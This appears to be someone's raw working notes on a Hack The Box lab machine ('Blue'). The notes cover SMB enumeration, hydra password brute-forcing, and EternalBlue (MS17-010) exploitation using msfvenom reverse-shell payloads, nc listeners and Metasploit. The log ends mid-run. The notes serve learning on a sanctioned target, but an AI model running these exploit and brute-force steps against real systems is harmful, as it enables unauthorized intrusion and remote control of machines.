rpcclient $> lsaaddacctrights S-1-5-21-319597671-3711062392-2889596693-501 SeCreateTokenPrivilege
result was NT_STATUS_CONNECTION_DISCONNECTED

rpcclient $> lsaenumprivsaccount S-1-5-21-319597671-3711062392-2889596693-1000
result was NT_STATUS_OBJECT_NAME_NOT_FOUND

rpcclient $> lsaenumprivsaccount S-1-5-21-319597671-3711062392-2889596693-501
result was NT_STATUS_ACCESS_DENIED

lsalookupprivvalue SeCreateTokenPrivielge

lsaquerysecobj

Enumerate the security objects or permissions and privileges related to the security.

rpcclient $> lsaquerysecobj
revision: 1
type: 0x8004: SEC_DESC_DACL_PRESENT SEC_DESC_SELF_RELATIVE 
DACL
	ACL	Num ACEs:	7	revision:	2
	---
	ACE
		type: ACCESS DENIED (1) flags: 0x00 
		Specific bits: 0x800
		Permissions: 0x800: 
		SID: S-1-5-7

	ACE
		type: ACCESS ALLOWED (0) flags: 0x00 
		Specific bits: 0x1fff
		Permissions: 0xf1fff: WRITE_OWNER_ACCESS WRITE_DAC_ACCESS READ_CONTROL_ACCESS DELETE_ACCESS 
		SID: S-1-5-32-544

	ACE
		type: ACCESS ALLOWED (0) flags: 0x00 
		Specific bits: 0x801
		Permissions: 0x20801: READ_CONTROL_ACCESS 
		SID: S-1-1-0

	ACE
		type: ACCESS ALLOWED (0) flags: 0x00 
		Specific bits: 0x801
		Permissions: 0x801: 
		SID: S-1-5-7

	ACE
		type: ACCESS ALLOWED (0) flags: 0x00 
		Specific bits: 0x1000
		Permissions: 0x1000: 
		SID: S-1-5-19

	ACE
		type: ACCESS ALLOWED (0) flags: 0x00 
		Specific bits: 0x1000
		Permissions: 0x1000: 
		SID: S-1-5-20

	ACE
		type: ACCESS ALLOWED (0) flags: 0x00 
		Specific bits: 0x1000
		Permissions: 0x1000: 
		SID: S-1-5-17

rpcclient $>

What else we can do?

rpcclient $> lookupnames administrators
administrators S-1-5-32-544 (Local Group: 4)

rpcclient $> lookupnames administrator
administrator S-1-5-21-319597671-3711062392-2889596693-500 (User: 1)

Maybe we can mount share?

I've ran in to issues and doing TS now:

sudo apt install nfs-common
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Package nfs-common is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source

E: Package 'nfs-common' has no installation candidate

dpkg -l cifs-utils
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWai>
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name           Version      Architecture Description
+++-==============-============-============-======================>
un  cifs-utils     <none>       <none>       (no description availa>

sudo apt install cifs-utils
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Package cifs-utils is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source

E: Package 'cifs-utils' has no installation candidate

Mirrors | ParrotOS Documentationparrotsec.org

cat /etc/apt/sources.list.d/parrot.list

sudo apt install cifs-utils
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following packages were automatically installed and are no longer required:
  coinor-libcbc3 coinor-libcgl1 coinor-libclp1 coinor-libcoinmp1v5 coinor-libcoinutils3v5 coinor-libosi1v5
  espeak espeak-data ffmpegthumbnailer fonts-opensymbol fonts-symbola gimp gimp-data gir1.2-gstreamer-1.0
  gstreamer1.0-gtk3 gtk2-engines-murrine hyphen-en-us libabsl20200923 libabw-0.1-1 libamd2 libao-common
  libao4 libbabl-0.1-0 libboost-locale1.74.0 libbox2d2.3.0 libbrlapi0.8 libcamd2 libccolamd2 libcdr-0.1-1
  libcholmod3 libclucene-contribs1v5 libclucene-core1v5 libcolamd2 libdotconf0 libe-book-0.1-1 libeot0
  libepubgen-0.1-1 libespeak1 libetonyek-0.1-1 libexiv2-27 libexttextcat-2.0-0 libexttextcat-data
  libffmpegthumbnailer4v5 libfreehand-0.1-1 libgegl-0.4-0 libgegl-common libgexiv2-2 libgimp2.0
  liblangtag-common liblangtag1 liblouis-data liblouis20 libmetis5 libmng1 libmsgpackc2 libmspub-0.1-1
  libmypaint-1.5-1 libmypaint-common libmythes-1.2-0 libnumbertext-1.0-0 libnumbertext-data
  libodfgen-0.1-1 libpagemaker-0.0-0 libqxp-0.0-0 libraptor2-0 librasqal3 libraw20 librdf0
  libreoffice-base-core libreoffice-calc libreoffice-common libreoffice-core libreoffice-draw
  libreoffice-gtk3 libreoffice-impress libreoffice-math libreoffice-style-colibre libreoffice-writer
  librevenge-0.0-0 libsonic0 libstaroffice-0.0-0 libsuitesparseconfig5 libtermkey1 libumfpack5
  libunibilium4 libuno-cppu3 libuno-cppuhelpergcc3-3 libuno-purpenvhelpergcc3-3 libuno-sal3
  libuno-salhelpergcc3-3 libvisio-0.1-1 libvterm0 libwpd-0.10-10 libwpg-0.3-3 libwps-0.4-4 libxmlsec1-nss
  libyajl2 libzmf-0.0-0 lp-solve lua-luv mate-backgrounds mate-terminal-common mate-themes neovim-runtime
  orca perl-tk python3-brlapi python3-louis python3-neovim python3-pyatspi python3-pynvim python3-speechd
  python3-uno sound-icons speech-dispatcher speech-dispatcher-audio-plugins task-desktop uno-libs-private
  ure xbrlapi xkbset
Use 'sudo apt autoremove' to remove them.
Suggested packages:
  winbind
The following NEW packages will be installed:
  cifs-utils
0 upgraded, 1 newly installed, 0 to remove and 538 not upgraded.
Need to get 90.4 kB of archives.
After this operation, 314 kB of additional disk space will be used.
Get:1 https://deb.parrot.sh/parrot parrot/main amd64 cifs-utils amd64 2:6.11-3.1+deb11u1 [90.4 kB]
Fetched 90.4 kB in 1s (168 kB/s)     
Selecting previously unselected package cifs-utils.
(Reading database ... 492097 files and directories currently installed.)
Preparing to unpack .../cifs-utils_2%3a6.11-3.1+deb11u1_amd64.deb ...
Unpacking cifs-utils (2:6.11-3.1+deb11u1) ...
Setting up cifs-utils (2:6.11-3.1+deb11u1) ...
update-alternatives: using /usr/lib/x86_64-linux-gnu/cifs-utils/idmapwb.so to provide /etc/cifs-utils/idmap-
plugin (idmap-plugin) in auto mode
Processing triggers for man-db (2.10.1-1~bpo11+1) ...
Scanning application launchers
Removing duplicate launchers or broken launchers
Launchers are updated

sudo apt install nfs-common
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following packages were automatically installed and are no longer required:
  coinor-libcbc3 coinor-libcgl1 coinor-libclp1 coinor-libcoinmp1v5 coinor-libcoinutils3v5 coinor-libosi1v5
  espeak espeak-data ffmpegthumbnailer fonts-opensymbol fonts-symbola gimp gimp-data gir1.2-gstreamer-1.0
  gstreamer1.0-gtk3 gtk2-engines-murrine hyphen-en-us libabsl20200923 libabw-0.1-1 libamd2 libao-common
  libao4 libbabl-0.1-0 libboost-locale1.74.0 libbox2d2.3.0 libbrlapi0.8 libcamd2 libccolamd2 libcdr-0.1-1
  libcholmod3 libclucene-contribs1v5 libclucene-core1v5 libcolamd2 libdotconf0 libe-book-0.1-1 libeot0
  libepubgen-0.1-1 libespeak1 libetonyek-0.1-1 libexiv2-27 libexttextcat-2.0-0 libexttextcat-data
  libffmpegthumbnailer4v5 libfreehand-0.1-1 libgegl-0.4-0 libgegl-common libgexiv2-2 libgimp2.0
  liblangtag-common liblangtag1 liblouis-data liblouis20 libmetis5 libmng1 libmsgpackc2 libmspub-0.1-1
  libmypaint-1.5-1 libmypaint-common libmythes-1.2-0 libnumbertext-1.0-0 libnumbertext-data
  libodfgen-0.1-1 libpagemaker-0.0-0 libqxp-0.0-0 libraptor2-0 librasqal3 libraw20 librdf0
  libreoffice-base-core libreoffice-calc libreoffice-common libreoffice-core libreoffice-draw
  libreoffice-gtk3 libreoffice-impress libreoffice-math libreoffice-style-colibre libreoffice-writer
  librevenge-0.0-0 libsonic0 libstaroffice-0.0-0 libsuitesparseconfig5 libtermkey1 libumfpack5
  libunibilium4 libuno-cppu3 libuno-cppuhelpergcc3-3 libuno-purpenvhelpergcc3-3 libuno-sal3
  libuno-salhelpergcc3-3 libvisio-0.1-1 libvterm0 libwpd-0.10-10 libwpg-0.3-3 libwps-0.4-4 libxmlsec1-nss
  libyajl2 libzmf-0.0-0 lp-solve lua-luv mate-backgrounds mate-terminal-common mate-themes neovim-runtime
  orca perl-tk python3-brlapi python3-louis python3-neovim python3-pyatspi python3-pynvim python3-speechd
  python3-uno sound-icons speech-dispatcher speech-dispatcher-audio-plugins task-desktop uno-libs-private
  ure xbrlapi xkbset
Use 'sudo apt autoremove' to remove them.
The following additional packages will be installed:
  libnfsidmap2 rpcbind
Suggested packages:
  open-iscsi watchdog
The following NEW packages will be installed:
  libnfsidmap2 nfs-common rpcbind
0 upgraded, 3 newly installed, 0 to remove and 538 not upgraded.
Need to get 316 kB of archives.
After this operation, 1,064 kB of additional disk space will be used.
Do you want to continue? [Y/n] y
Get:1 https://deb.parrot.sh/parrot parrot/main amd64 rpcbind amd64 1.2.5-9 [51.4 kB]
Get:2 https://deb.parrot.sh/parrot parrot/main amd64 libnfsidmap2 amd64 0.25-6 [32.6 kB]
Get:3 https://deb.parrot.sh/parrot parrot/main amd64 nfs-common amd64 1:1.3.4-6 [232 kB]
Fetched 316 kB in 1s (372 kB/s)         
Selecting previously unselected package rpcbind.
(Reading database ... 492130 files and directories currently installed.)
Preparing to unpack .../rpcbind_1.2.5-9_amd64.deb ...
Unpacking rpcbind (1.2.5-9) ...
Selecting previously unselected package libnfsidmap2:amd64.
Preparing to unpack .../libnfsidmap2_0.25-6_amd64.deb ...
Unpacking libnfsidmap2:amd64 (0.25-6) ...
Selecting previously unselected package nfs-common.
Preparing to unpack .../nfs-common_1%3a1.3.4-6_amd64.deb ...
Unpacking nfs-common (1:1.3.4-6) ...
Setting up rpcbind (1.2.5-9) ...
Use of uninitialized value $service in hash element at /usr/sbin/update-rc.d line 26, <DATA> line 45.
update-rc.d: rpcbind is in our deadpool blacklist! YOU SHALL NOT PASS!
Created symlink /etc/systemd/system/sockets.target.wants/rpcbind.socket → /lib/systemd/system/rpcbind.socket
.
rpcbind.service is a disabled or a static unit, not starting it.
Setting up libnfsidmap2:amd64 (0.25-6) ...
Setting up nfs-common (1:1.3.4-6) ...

Creating config file /etc/idmapd.conf with new version
Adding system user `statd' (UID 135) ...
Adding new user `statd' (UID 135) with group `nogroup' ...
Not creating home directory `/var/lib/nfs'.
Created symlink /etc/systemd/system/multi-user.target.wants/nfs-client.target → /lib/systemd/system/nfs-clie
nt.target.
Created symlink /etc/systemd/system/remote-fs.target.wants/nfs-client.target → /lib/systemd/system/nfs-clien
t.target.
nfs-utils.service is a disabled or a static unit, not starting it.
Use of uninitialized value $service in hash element at /usr/sbin/update-rc.d line 26, <DATA> line 45.
update-rc.d: nfs-common is in our deadpool blacklist! YOU SHALL NOT PASS!
Processing triggers for man-db (2.10.1-1~bpo11+1) ...
Processing triggers for libc-bin (2.31-13+deb11u3) ...
Scanning application launchers
Removing duplicate launchers or broken launchers
Launchers are updated

ls -lahtR > ~/Desktop/HTB/Machines/Retired/Windows/Easy/Blue/smbshare.txt

Did not find any value there.

sudo umount -t cifs /mnt/admin

enum4linux -a -v blue.htb

[V] Dependent program "nmblookup" found in /usr/bin/nmblookup
[V] Dependent program "net" found in /usr/bin/net
[V] Dependent program "rpcclient" found in /usr/bin/rpcclient
[V] Dependent program "smbclient" found in /usr/bin/smbclient
[V] Dependent program "polenum" found in /usr/bin/polenum
[V] Dependent program "ldapsearch" found in /usr/bin/ldapsearch
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Oct 10 14:18:25 2023

 ========================== 
|    Target Information    |
 ========================== 
Target ........... blue.htb
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ================================================ 
|    Enumerating Workgroup/Domain on blue.htb    |
 ================================================ 
[V] Attempting to get domain name with command: nmblookup -A 'blue.htb'
[E] Can't find workgroup/domain


 ======================================== 
|    Nbtstat Information for blue.htb    |
 ======================================== 
Looking up status of 10.129.123.117
No reply from 10.129.123.117

 ================================= 
|    Session Check on blue.htb    |
 ================================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[V] Attempting to make null session using command: smbclient -W '' //'blue.htb'/ipc$ -U''%'' -c 'help' 2>&1
[+] Server blue.htb allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name: 

 ======================================= 
|    Getting domain SID for blue.htb    |
 ======================================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
[V] Attempting to get domain SID with command: rpcclient -W '' -U''%'' blue.htb -c 'lsaquery' 2>&1
Could not initialise lsarpc. Error was NT_STATUS_ACCESS_DENIED
[+] Can't determine if host is part of domain or part of a workgroup

 ================================== 
|    OS information on blue.htb    |
 ================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458.
[V] Attempting to get OS info with command: smbclient -W '' //'blue.htb'/ipc$ -U''%'' -c 'q' 2>&1
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for blue.htb from smbclient: 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 467.
[V] Attempting to get OS info with command: rpcclient -W '' -U''%'' -c 'srvinfo' 'blue.htb' 2>&1
[+] Got OS info for blue.htb from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

 ========================= 
|    Users on blue.htb    |
 ========================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
[V] Attempting to get userlist with command: rpcclient -W '' -c querydispinfo -U''%'' 'blue.htb' 2>&1
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
[V] Attempting to get userlist with command: rpcclient -W '' -c enumdomusers -U''%'' 'blue.htb' 2>&1
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED

 ===================================== 
|    Share Enumeration on blue.htb    |
 ===================================== 
[V] Attempting to get share list using authentication
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.

	Sharename       Type      Comment
	---------       ----      -------
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on blue.htb

 ================================================ 
|    Password Policy Information for blue.htb    |
 ================================================ 
[V] Attempting to get Password Policy info with command: polenum '':''@'blue.htb' 2>&1
[E] Unexpected error from polenum:


[+] Attaching to blue.htb using a NULL share

[+] Trying protocol 139/SMB...

	[!] Protocol failed: Cannot request session (Called Name:BLUE.HTB)

[+] Trying protocol 445/SMB...

	[!] Protocol failed: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 501.
[V] Attempting to get Password Policy info with command: rpcclient -W '' -U''%'' 'blue.htb' -c "getdompwinfo" 2>&1

[E] Failed to get password policy with rpcclient


 ========================== 
|    Groups on blue.htb    |
 ========================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.
[V] Getting builtin groups with command: rpcclient -W '' -U''%'' 'blue.htb' -c 'enumalsgroups builtin' 2>&1

[+] Getting builtin groups:

[+] Getting builtin group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.
[V] Getting local groups with command: rpcclient -W '' -U''%'' 'blue.htb' -c 'enumalsgroups domain' 2>&1

[+] Getting local groups:

[+] Getting local group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 593.
[V] Getting domain groups with command: rpcclient -W '' -U''%'' 'blue.htb' -c "enumdomgroups" 2>&1

[+] Getting domain groups:

[+] Getting domain group memberships:

 =================================================================== 
|    Users on blue.htb via RID cycling (RIDS: 500-550,1000-1050)    |
 =================================================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710.
[V] Attempting to get SID from blue.htb with command: rpcclient -W '' -U''%'' 'blue.htb' -c 'lookupnames administrator' 2>&1
[V] Assuming that user "administrator" exists
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 742.
[V] Attempting to get SIDs from blue.htb with command: rpcclient -W '' -U''%'' 'blue.htb' -c lsaenumsid 2>&1

 ========================================= 
|    Getting printer info for blue.htb    |
 ========================================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 991.
[V] Attempting to get printer info with command: rpcclient -W '' -U''%'' -c 'enumprinters' 'blue.htb' 2>&1
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED


enum4linux complete on Tue Oct 10 14:18:53 2023

smbclient //blue.htb/IPC$ -U""

If we are able to log in in to "null" session, can we bruteforce in?

nmap --script=smb-brute -p 445 blue.htb -v

nmap --script=smb-vuln* -p 445 blue.htb -v

Starting Nmap 7.92 ( https://nmap.org ) at 2023-10-10 14:30 EDT
NSE: Loaded 11 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:30
Completed NSE at 14:30, 0.00s elapsed
Initiating Ping Scan at 14:30
Scanning blue.htb (10.129.123.117) [2 ports]
Completed Ping Scan at 14:30, 0.06s elapsed (1 total hosts)
Initiating Connect Scan at 14:30
Scanning blue.htb (10.129.123.117) [1 port]
Discovered open port 445/tcp on 10.129.123.117
Completed Connect Scan at 14:30, 0.05s elapsed (1 total ports)
NSE: Script scanning 10.129.123.117.
Initiating NSE at 14:30
Completed NSE at 14:30, 12.85s elapsed
Nmap scan report for blue.htb (10.129.123.117)
Host is up (0.056s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND

NSE: Script Post-scanning.
Initiating NSE at 14:30
Completed NSE at 14:30, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 13.17 seconds

hydra smb://blue.htb -l Administrator -P /usr/share/TheSecList/SecLists/Passwords/Default-Credentials/vnc-betterdefaultpasslist.txt  -V

wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

hydra smb://blue.htb -l Administrator -P rockyou.txt -V

hydra smb://blue.htb -l Haris -P rockyou.txt -V

Checked NTUSER.DAT logs and files, nothing there. So I think it's time to read about

Customer Guidance for WannaCrypt attacksblogs.technet.microsoft.com

WannaCrypt ransomware worm targets out-of-date systems | Microsoft Security BlogMicrosoft Security Blog

Let's google about MS17-010 since nmap says that it's vulnerable. And I want to do as much manual or semi-manual as I can because doing this in Metasploit is easy and won't teach me anything.

Let's try this one:

Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)Exploit Database

GitHub - 3ndG4me/AutoBlue-MS17-010: This is just an semi-automated fully working, no-bs, non-metasploit version of the public exploit code for MS17-010GitHub

Stage 2: Vulnerability assessment

The vulnerability assessment builds on information gathered during enumeration. We’re probing for known vulnerabilities in the system or application; and will then test them with specialized tools and techniques to determine if there is indeed a method of exploitation.

git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git

ls -l
total 184
-rw-r--r-- 1 root root 26444 Oct 10 16:02 eternalblue_exploit10.py
-rw-r--r-- 1 root root 25741 Oct 10 16:02 eternalblue_exploit7.py
-rw-r--r-- 1 root root 24106 Oct 10 16:02 eternalblue_exploit8.py
-rw-r--r-- 1 root root  2801 Oct 10 16:02 eternal_checker.py
-rw-r--r-- 1 root root  1070 Oct 10 16:02 LICENSE
-rwxr-xr-x 1 root root  3853 Oct 10 16:02 listener_prep.sh
-rw-r--r-- 1 root root 25943 Oct 10 16:02 mysmb.py
-rw-r--r-- 1 root root  5352 Oct 10 16:02 README.md
-rw-r--r-- 1 root root     8 Oct 10 16:02 requirements.txt
drwxr-xr-x 1 root root   192 Oct 10 16:02 shellcode
-rw-r--r-- 1 root root 49249 Oct 10 16:02 zzz_exploit.py

┌─[user@user-virtualbox]─[/usr/share/EternalBlue/AutoBlue-MS17-010]
└──╼ $pip install -r requirements.txt 
Defaulting to user installation because normal site-packages is not writeable
Requirement already satisfied: impacket in /usr/lib/python3/dist-packages (from -r requirements.txt (line 1)) (0.9.22)

python3 eternal_checker.py blue.htb

Let's do the same for hands-on experience with Metasploit.

searchsploit ms17-010
------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                         |  Path
------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Met | windows/remote/43970.rb
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit)                          | windows/dos/41891.rb
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)                       | windows/remote/42031.py
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)   | windows/remote/42315.py
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)             | windows_x86-64/remote/42030.py
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)          | windows_x86-64/remote/41987.py
------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

msfconsole

I think we are ready to attempt exploit semi-manully and automatically. Unfortunatelly I do not have required knowledge to understand in-depth how it works under the hood, but this is exactly what I wish to achieve. As a state of art develop a skill of creating same level personal exploits and tools crafted in tailored manner.

Stage 3: Exploitation

Targeting the vulnerabilities identified in the previous step, an attack is crafted and executed. This could be anything from a crafted piece of code or malicious file used to exploit an OS or application vulnerability, to showing that file upload and execution capabilities exist within a web app.

cd shellcode/

sudo ./shell_prep.sh 
                 _.-;;-._
          '-..-'|   ||   |
          '-..-'|_.-;;-._|
          '-..-'|   ||   |
          '-..-'|_.-''-._|   
Eternal Blue Windows Shellcode Compiler

Let's compile them windoos shellcodezzz

Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
y
LHOST for reverse connection:
tun0
LPORT you want x64 to listen on:
1337
LPORT you want x86 to listen on:
1338
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
1
Type 0 to generate a staged payload or 1 to generate a stageless payload
0
Generating x64 cmd shell (staged)...

msfvenom -p windows/x64/shell/reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=tun0 LPORT=1337
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 511 bytes
Saved as: sc_x64_msf.bin

Generating x86 cmd shell (staged)...

msfvenom -p windows/shell/reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=tun0 LPORT=1338
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 375 bytes
Saved as: sc_x86_msf.bin

MERGING SHELLCODE WOOOO!!!
DONE

nc -nvlp 1337

nc -nvlp 1338

sudo python3 eternalblue_exploit7.py blue.htb shellcode/sc_x64.bin

shellcode size: 1232
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done

nc -nvlp 1337
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.129.123.117.
Ncat: Connection from 10.129.123.117:49158.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>systeminfo
systeminfo


Host Name:                 HARIS-PC
OS Name:                   Microsoft Windows 7 Professional 
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          haris
Registered Organization:   
Product ID:                00371-222-9819843-86066
Original Install Date:     14/07/2017, 14:45:30
System Boot Time:          10/10/2023, 21:41:53
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2394 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/11/2020
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-gb;English (United Kingdom)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC) Dublin, Edinburgh, Lisbon, London
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,508 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 3,541 MB
Virtual Memory: In Use:    554 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 178 Hotfix(s) Installed.
                           [01]: KB2849697
                           ...
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.129.0.1
                                 IP address(es)
                                 [01]: 10.129.123.117
                                 [02]: fe80::3d9b:2447:10f:b2c3
                                 [03]: dead:beef::4d8d:db54:5011:1773
                                 [04]: dead:beef::3d9b:2447:10f:b2c3

Now back to Metasploit.

[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> exploit

[*] Started reverse TCP handler on 10.0.2.15:4444 
[*] 10.129.123.117:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.129.123.117:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.129.123.117:445    - Scanned 1 of 1 hosts (100% complete)
[+] 10.129.123.117:445 - The target is vulnerable.
[*] 10.129.123.117:445 - Connecting to target for exploitation.
[+] 10.129.123.117:445 - Connection established for exploitation.
[+] 10.129.123.117:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.129.123.117:445 - CORE raw buffer dump (42 bytes)
[*] 10.129.123.117:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.129.123.117:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.129.123.117:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.129.123.117:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.129.123.117:445 - Trying exploit with 12 Groom Allocations.
[*] 10.129.123.117:445 - Sending all but last fragment of exploit packet
[*] 10.129.123.117:445 - Starting non-paged pool grooming
[+] 10.129.123.117:445 - Sending SMBv2 buffers
[+] 10.129.123.117:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.129.123.117:445 - Sending final SMBv2 buffers.
[*] 10.129.123.117:445 - Sending last fragment of exploit packet!
[*] 10.129.123.117:445 - Receiving response from exploit packet
[+] 10.129.123.117:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.129.123.117:445 - Sending egg to corrupted connection.
[*] 10.129.123.117:445 - Triggering free of corrupted buffer.
[-] 10.129.123.117:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.129.123.117:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.129.123.117:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.129.123.117:445 - Connecting to target for exploitation.
[+] 10.129.123.117:445 - Connection established for exploitation.
[+] 10.129.123.117:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.129.123.117:445 - CORE raw buffer dump (42 bytes)
[*] 10.129.123.117:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.129.123.117:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.129.123.117:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.129.123.117:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.129.123.117:445 - Trying exploit with 17 Groom Allocations.
[*] 10.129.123.117:445 - Sending all but last fragment of exploit packet
[*] 10.129.123.117:445 - Starting non-paged pool grooming
[+] 10.129.123.117:445 - Sending SMBv2 buffers
[+] 10.129.123.117:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
